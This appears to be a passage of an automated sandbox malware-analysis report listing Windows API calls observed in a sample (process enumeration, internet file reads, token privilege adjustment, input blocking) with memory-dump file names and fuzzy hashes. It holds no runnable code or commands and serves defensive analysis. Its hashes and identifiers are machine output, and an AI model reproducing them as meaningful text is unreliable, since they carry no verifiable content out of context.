                    • Source File: 00000000.00000002.1694321510.0000000000741000.00000020.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true
                    • Associated: 00000000.00000002.1694272778.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694474178.00000000007CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694474178.00000000007F5000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694535562.00000000007FF000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.0000000000808000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.000000000080C000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.000000000081A000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_740000_b3u71vBG0u.jbxd
                    Similarity
                    • API ID: AddressLibraryLoadProc
                    • String ID: GetSystemWow64DirectoryW$kernel32.dll
                    • API String ID: 2574300362-1816364905
                    • Opcode ID: 1e5736c0d3b2a4bb48118da35fa1befb5cf805b74021a6e7ae4659a868d20d51
                    • Instruction ID: deaebaca336543427d2e08b5bf3be2947bc5f23e8473ca85016439de9ea353f1
                    • Opcode Fuzzy Hash: 1e5736c0d3b2a4bb48118da35fa1befb5cf805b74021a6e7ae4659a868d20d51
                    • Instruction Fuzzy Hash: 7BE0B6B4600716CFDB214B25D804B9676D5AB48755B84C43DE896D6250E778D8408A61
                    APIs
                    • CreateToolhelp32Snapshot.KERNEL32 ref: 007BF151
                    • Process32FirstW.KERNEL32(00000000,?), ref: 007BF15F
                      • Part of subcall function 00747F41: _memmove.LIBCMT ref: 00747F82
                    • Process32NextW.KERNEL32(00000000,?), ref: 007BF21F
                    • CloseHandle.KERNEL32(00000000,?,?,?), ref: 007BF22E
                    Memory Dump Source
                    • Source File: 00000000.00000002.1694321510.0000000000741000.00000020.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true
                    • Associated: 00000000.00000002.1694272778.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694474178.00000000007CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694474178.00000000007F5000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694535562.00000000007FF000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.0000000000808000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.000000000080C000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.000000000081A000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_740000_b3u71vBG0u.jbxd
                    Similarity
                    • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32_memmove
                    • String ID:
                    • API String ID: 2576544623-0
                    • Opcode ID: 6df03e8e0c7a7aab9178f7693af757160818edf7b30e081a6ef33b283f7ceff3
                    • Instruction ID: 1c709f57f29b0d000549c9530a826c526c2c8c2e351db68725f108c7f0fa6734
                    • Opcode Fuzzy Hash: 6df03e8e0c7a7aab9178f7693af757160818edf7b30e081a6ef33b283f7ceff3
                    • Instruction Fuzzy Hash: 4E516B71504314EFD310EF24DC89EABBBE8BF98710F14492DF59597291EB74A908CB92
                    APIs
                    • lstrlenW.KERNEL32(?,?,?,00000000), ref: 0079EB19
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1694321510.0000000000741000.00000020.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true
                    • Associated: 00000000.00000002.1694272778.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694474178.00000000007CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694474178.00000000007F5000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694535562.00000000007FF000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.0000000000808000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.000000000080C000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.000000000081A000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_740000_b3u71vBG0u.jbxd
                    Similarity
                    • API ID: lstrlen
                    • String ID: ($|
                    • API String ID: 1659193697-1631851259
                    • Opcode ID: dfcb69ff8d9297dcc62a4df91030c29117de466e08d0207d3d2e57b29e423a6d
                    • Instruction ID: bd409ae80303ec2e621a2589b90dad340909eb2474cbb81bca4991741fc9246f
                    • Opcode Fuzzy Hash: dfcb69ff8d9297dcc62a4df91030c29117de466e08d0207d3d2e57b29e423a6d
                    • Instruction Fuzzy Hash: D23236B5A00605DFDB28CF19D481A6AB7F1FF48320B15C56EE89ADB3A1E774E941CB40
                    APIs
                    • InternetQueryDataAvailable.WININET(00000001,?,00000000,00000000), ref: 007B26D5
                    • InternetReadFile.WININET(00000001,00000000,00000001,00000001), ref: 007B270C
                    Memory Dump Source
                    • Source File: 00000000.00000002.1694321510.0000000000741000.00000020.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true
                    • Associated: 00000000.00000002.1694272778.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694474178.00000000007CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694474178.00000000007F5000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694535562.00000000007FF000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.0000000000808000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.000000000080C000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.000000000081A000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_740000_b3u71vBG0u.jbxd
                    Similarity
                    • API ID: Internet$AvailableDataFileQueryRead
                    • String ID:
                    • API String ID: 599397726-0
                    • Opcode ID: 35f69d0c440430c8883744a3677e5abe8f9c687e13c03272696b582bf4b29f9d
                    • Instruction ID: 62fd4c0d3a47cb6361264c16430bdab05d1b0d538a06e107925f261b81198b10
                    • Opcode Fuzzy Hash: 35f69d0c440430c8883744a3677e5abe8f9c687e13c03272696b582bf4b29f9d
                    • Instruction Fuzzy Hash: D641D671501209FFEB20DE54DC89FFBB7BCEB40718F10406EFA05A6542EE799E429658
                    APIs
                    • SetErrorMode.KERNEL32(00000001), ref: 007AB5AE
                    • GetDiskFreeSpaceExW.KERNEL32(?,?,?,?), ref: 007AB608
                    • SetErrorMode.KERNEL32(00000000,00000001,00000000), ref: 007AB655
                    Memory Dump Source
                    • Source File: 00000000.00000002.1694321510.0000000000741000.00000020.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true
                    • Associated: 00000000.00000002.1694272778.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694474178.00000000007CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694474178.00000000007F5000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694535562.00000000007FF000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.0000000000808000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.000000000080C000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.000000000081A000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_740000_b3u71vBG0u.jbxd
                    Similarity
                    • API ID: ErrorMode$DiskFreeSpace
                    • String ID:
                    • API String ID: 1682464887-0
                    • Opcode ID: 84bc575c5ba98a27f64e4daefad1881b0d040fb7c156f6b527526fa95be58c8b
                    • Instruction ID: 68323b8fb0014ecba352cdd3fde301e05242555e06e69c8818d2098fe94504ff
                    • Opcode Fuzzy Hash: 84bc575c5ba98a27f64e4daefad1881b0d040fb7c156f6b527526fa95be58c8b
                    • Instruction Fuzzy Hash: 81217F35A00118EFCB00EFA5D884EEEBBB8FF89310F1481A9E905AB351DB35A915CB55
                    APIs
                      • Part of subcall function 00760FF6: std::exception::exception.LIBCMT ref: 0076102C
                      • Part of subcall function 00760FF6: __CxxThrowException@8.LIBCMT ref: 00761041
                    • LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00798D0D
                    • AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00798D3A
                    • GetLastError.KERNEL32 ref: 00798D47
                    Memory Dump Source
                    • Source File: 00000000.00000002.1694321510.0000000000741000.00000020.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true
                    • Associated: 00000000.00000002.1694272778.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694474178.00000000007CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694474178.00000000007F5000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694535562.00000000007FF000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.0000000000808000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.000000000080C000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.000000000081A000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_740000_b3u71vBG0u.jbxd
                    Similarity
                    • API ID: AdjustErrorException@8LastLookupPrivilegePrivilegesThrowTokenValuestd::exception::exception
                    • String ID:
                    • API String ID: 1922334811-0
                    • Opcode ID: 9a88b21a9150a34b6c859d4d9d6677d5456e79b89b7b49c3f7bcfbf5899fb855
                    • Instruction ID: 093ccb15dae17cab51befa49b13e2a92cdc828607a39eed71c16da7dd69748f2
                    • Opcode Fuzzy Hash: 9a88b21a9150a34b6c859d4d9d6677d5456e79b89b7b49c3f7bcfbf5899fb855
                    • Instruction Fuzzy Hash: 6C1191B2514209AFDB28EF54EC89D6BB7BDFB45710B24852EF85693241EB34AC408A64
                    APIs
                    • CreateFileW.KERNEL32(?,00000080,00000003,00000000,00000003,00000080,00000000), ref: 007A404B
                    • DeviceIoControl.KERNEL32(00000000,002D1400,00000007,0000000C,?,0000000C,?,00000000), ref: 007A4088
                    • CloseHandle.KERNEL32(00000000,?,?,00000080,00000003,00000000,00000003,00000080,00000000), ref: 007A4091
                    Memory Dump Source
                    • Source File: 00000000.00000002.1694321510.0000000000741000.00000020.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true
                    • Associated: 00000000.00000002.1694272778.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694474178.00000000007CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694474178.00000000007F5000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694535562.00000000007FF000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.0000000000808000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.000000000080C000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.000000000081A000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_740000_b3u71vBG0u.jbxd
                    Similarity
                    • API ID: CloseControlCreateDeviceFileHandle
                    • String ID:
                    • API String ID: 33631002-0
                    • Opcode ID: 4ca2532246beffbc8c46c75741045fd2cb72509ef5deb3c3a46d1ea8d0ece57e
                    • Instruction ID: 3c3bd1fa421ddb86ec007861dac7c5ce8354dc97757a874472d95d31b061640a
                    • Opcode Fuzzy Hash: 4ca2532246beffbc8c46c75741045fd2cb72509ef5deb3c3a46d1ea8d0ece57e
                    • Instruction Fuzzy Hash: 341186B2D00228BEE7109BE8DC44FAFBBBCEB89710F004656FA04E7191C2B95D0547A1
                    APIs
                    • AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 007A4C2C
                    • CheckTokenMembership.ADVAPI32(00000000,?,?), ref: 007A4C43
                    • FreeSid.ADVAPI32(?), ref: 007A4C53
                    Memory Dump Source
                    • Source File: 00000000.00000002.1694321510.0000000000741000.00000020.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true
                    • Associated: 00000000.00000002.1694272778.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694474178.00000000007CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694474178.00000000007F5000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694535562.00000000007FF000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.0000000000808000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.000000000080C000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.000000000081A000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_740000_b3u71vBG0u.jbxd
                    Similarity
                    • API ID: AllocateCheckFreeInitializeMembershipToken
                    • String ID:
                    • API String ID: 3429775523-0
                    • Opcode ID: 7f03769212c986dfa753919224f7f494ec9a13f08c24ce1be1e6f5273c7ba2c0
                    • Instruction ID: dd1cc1d49bf33f51485d5607ba52f86591f80f2857c47c6046bbeb0a0934ec9d
                    • Opcode Fuzzy Hash: 7f03769212c986dfa753919224f7f494ec9a13f08c24ce1be1e6f5273c7ba2c0
                    • Instruction Fuzzy Hash: BEF03775A51208BBDB04DFE09C89EAEBBB9EB08611F0084A9E901E2181E6756A448B54
                    Memory Dump Source
                    • Source File: 00000000.00000002.1694321510.0000000000741000.00000020.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true
                    • Associated: 00000000.00000002.1694272778.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694474178.00000000007CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694474178.00000000007F5000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694535562.00000000007FF000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.0000000000808000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.000000000080C000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.000000000081A000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_740000_b3u71vBG0u.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: bdc0bf38f9aa08127838bf9e38ee912893ae26df32f614ea579e708073bcd1c1
                    • Instruction ID: 70d0668677e76e142a60bd4687cc26161ad2b4123a884a0cfea8b9ce3a187ac2
                    • Opcode Fuzzy Hash: bdc0bf38f9aa08127838bf9e38ee912893ae26df32f614ea579e708073bcd1c1
                    • Instruction Fuzzy Hash: 1C22AFB0A00219DFDB24DF58C484ABEBBF1FF04320F148569E856AB351E778AD85CB91
                    APIs
                    • FindFirstFileW.KERNEL32(?,?), ref: 007AC966
                    • FindClose.KERNEL32(00000000), ref: 007AC996
                    Memory Dump Source
                    • Source File: 00000000.00000002.1694321510.0000000000741000.00000020.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true
                    • Associated: 00000000.00000002.1694272778.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694474178.00000000007CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694474178.00000000007F5000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694535562.00000000007FF000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.0000000000808000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.000000000080C000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.000000000081A000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_740000_b3u71vBG0u.jbxd
                    Similarity
                    • API ID: Find$CloseFileFirst
                    • String ID:
                    • API String ID: 2295610775-0
                    • Opcode ID: fe7c5964ab899ecfb3eac458647d0741e0df20e8d6523bcc80170e0d36a8793c
                    • Instruction ID: 9f77f0aae07b5d336d5dcc7187c6df8645d068d5d3d03d6bc487e38689a42c96
                    • Opcode Fuzzy Hash: fe7c5964ab899ecfb3eac458647d0741e0df20e8d6523bcc80170e0d36a8793c
                    • Instruction Fuzzy Hash: 5F1130716106009FDB109F29D849A6AB7E9EF85324F00C65EF9A5D7291DB34A800CB81
                    APIs
                    • GetLastError.KERNEL32(00000000,?,00000FFF,00000000,00000016,?,007B977D,?,007CFB84,?), ref: 007AA302
                    • FormatMessageW.KERNEL32(00001000,00000000,000000FF,00000000,?,00000FFF,00000000,00000016,?,007B977D,?,007CFB84,?), ref: 007AA314
                    Memory Dump Source
                    • Source File: 00000000.00000002.1694321510.0000000000741000.00000020.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true
                    • Associated: 00000000.00000002.1694272778.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694474178.00000000007CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694474178.00000000007F5000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694535562.00000000007FF000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.0000000000808000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.000000000080C000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.000000000081A000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_740000_b3u71vBG0u.jbxd
                    Similarity
                    • API ID: ErrorFormatLastMessage
                    • String ID:
                    • API String ID: 3479602957-0
                    • Opcode ID: 48b9150fea03afe4c97970d640958752987032ffb0291b8d6728b19ae104f187
                    • Instruction ID: 019871d0868436c68abcc074d4ad61b35bf2609a125129b8caa9f0b11049cf88
                    • Opcode Fuzzy Hash: 48b9150fea03afe4c97970d640958752987032ffb0291b8d6728b19ae104f187
                    • Instruction Fuzzy Hash: EAF0823554422DFBDB10AFA4CC49FEA776DBF09761F008269F908D6191D7349944CBA1
                    APIs
                    • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,00798851), ref: 00798728
                    • CloseHandle.KERNEL32(?,?,00798851), ref: 0079873A
                    Memory Dump Source
                    • Source File: 00000000.00000002.1694321510.0000000000741000.00000020.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true
                    • Associated: 00000000.00000002.1694272778.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694474178.00000000007CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694474178.00000000007F5000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694535562.00000000007FF000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.0000000000808000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.000000000080C000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.000000000081A000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_740000_b3u71vBG0u.jbxd
                    Similarity
                    • API ID: AdjustCloseHandlePrivilegesToken
                    • String ID:
                    • API String ID: 81990902-0
                    • Opcode ID: 3c0b083f1a3a48484916e2e1b0ba36962f2c46f9e12107a4bb9a7c715447979a
                    • Instruction ID: c2517ee7ad2bc89fa6cfaf050340d0fbf523cf2e9cd35163189c2f0d6bde299d
                    • Opcode Fuzzy Hash: 3c0b083f1a3a48484916e2e1b0ba36962f2c46f9e12107a4bb9a7c715447979a
                    • Instruction Fuzzy Hash: D1E0B676010A50EEEB252B60FD09D777BAAEB04750724882EF89780470DB66AC90DB50
                    APIs
                    • SetUnhandledExceptionFilter.KERNEL32(00000000,?,00768F97,?,?,?,00000001), ref: 0076A39A
                    • UnhandledExceptionFilter.KERNEL32(?,?,?,00000001), ref: 0076A3A3
                    Memory Dump Source
                    • Source File: 00000000.00000002.1694321510.0000000000741000.00000020.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true
                    • Associated: 00000000.00000002.1694272778.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694474178.00000000007CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694474178.00000000007F5000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694535562.00000000007FF000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.0000000000808000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.000000000080C000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.000000000081A000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_740000_b3u71vBG0u.jbxd
                    Similarity
                    • API ID: ExceptionFilterUnhandled
                    • String ID:
                    • API String ID: 3192549508-0
                    • Opcode ID: eb374efd2ab099b5b5b5a2ea54dd17004bfcdd9d8d0be2b8f05e308f435f587c
                    • Instruction ID: 1efdfeaed302e4e85d56b87a2c369ea146a2e9ada2255a515f359cda565f44b8
                    • Opcode Fuzzy Hash: eb374efd2ab099b5b5b5a2ea54dd17004bfcdd9d8d0be2b8f05e308f435f587c
                    • Instruction Fuzzy Hash: 71B09231054248BBCA002B91EC09F883F6AEB84AA2F408024FA0D84060CB6656508A99
                    Memory Dump Source
                    • Source File: 00000000.00000002.1694321510.0000000000741000.00000020.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true
                    • Associated: 00000000.00000002.1694272778.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694474178.00000000007CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694474178.00000000007F5000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694535562.00000000007FF000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.0000000000808000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.000000000080C000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.000000000081A000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_740000_b3u71vBG0u.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: a5cadebd90fc2fbabad9aa6d12599aae8107fc19f19ba3a26e7c1118e6dba045
                    • Instruction ID: e52a4035309c5b7feb31acd5e6cbb7dd24b024b498af72e6ffcf9e8f3ea58c5e
                    • Opcode Fuzzy Hash: a5cadebd90fc2fbabad9aa6d12599aae8107fc19f19ba3a26e7c1118e6dba045
                    • Instruction Fuzzy Hash: 0D321162D6AF414DD7279634E832336A359AFB73C4F14D737EC1AB5AA6EB2C84834104
                    Memory Dump Source
                    • Source File: 00000000.00000002.1694321510.0000000000741000.00000020.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true
                    • Associated: 00000000.00000002.1694272778.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694474178.00000000007CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694474178.00000000007F5000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694535562.00000000007FF000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.0000000000808000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.000000000080C000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.000000000081A000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_740000_b3u71vBG0u.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: b2f14b989d895f1311f04826bd12e6934cfd733a47e13ff5eae4593b2f757809
                    • Instruction ID: 36573127bc8c5a2481fab5395590ccc370bb4a0b1054ad857d36b84cc6b5a9d3
                    • Opcode Fuzzy Hash: b2f14b989d895f1311f04826bd12e6934cfd733a47e13ff5eae4593b2f757809
                    • Instruction Fuzzy Hash: E4B1EE20E2AF414DD62396398831336BB6CBFBB2C5F52D71BFC6A70D22EB2585834145
                    APIs
                    • __time64.LIBCMT ref: 007A8B25
                      • Part of subcall function 0076543A: GetSystemTimeAsFileTime.KERNEL32(00000000,?,?,?,007A91F8,00000000,?,?,?,?,007A93A9,00000000,?), ref: 00765443
                      • Part of subcall function 0076543A: __aulldiv.LIBCMT ref: 00765463
                    Memory Dump Source
                    • Source File: 00000000.00000002.1694321510.0000000000741000.00000020.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true
                    • Associated: 00000000.00000002.1694272778.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694474178.00000000007CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694474178.00000000007F5000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694535562.00000000007FF000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.0000000000808000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.000000000080C000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.000000000081A000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_740000_b3u71vBG0u.jbxd
                    Similarity
                    • API ID: Time$FileSystem__aulldiv__time64
                    • String ID:
                    • API String ID: 2893107130-0
                    • Opcode ID: ef67a3452057c95bd7d5dd4ffacb92ae36386042b3940868b84675d1ed0a5693
                    • Instruction ID: 4013ebf3063f7f57a04d746948ccc0ee6ecec45a73f354cc6dd9e6bbd4a286a4
                    • Opcode Fuzzy Hash: ef67a3452057c95bd7d5dd4ffacb92ae36386042b3940868b84675d1ed0a5693
                    • Instruction Fuzzy Hash: AE21A272625510CBC769CF29D841A52B3E1EBA5311B288F6CD1E5CB2D0CA74B945CB94
                    APIs
                    • BlockInput.USER32(00000001), ref: 007B4218
                    Memory Dump Source
                    • Source File: 00000000.00000002.1694321510.0000000000741000.00000020.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true
                    • Associated: 00000000.00000002.1694272778.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694474178.00000000007CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694474178.00000000007F5000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694535562.00000000007FF000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.0000000000808000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.000000000080C000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.000000000081A000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_740000_b3u71vBG0u.jbxd
                    Similarity
                    • API ID: BlockInput
                    • String ID:
                    • API String ID: 3456056419-0
                    • Opcode ID: f2cc0d3bd1a1bea68cfd88fdae51b6199751f39f66c52a075cb4a8a758941be0
                    • Instruction ID: 12de7c0471ce8d0a96059018a51f4fa87ef2ec4fcc20e6a11b1196cfe45fc082
                    • Opcode Fuzzy Hash: f2cc0d3bd1a1bea68cfd88fdae51b6199751f39f66c52a075cb4a8a758941be0
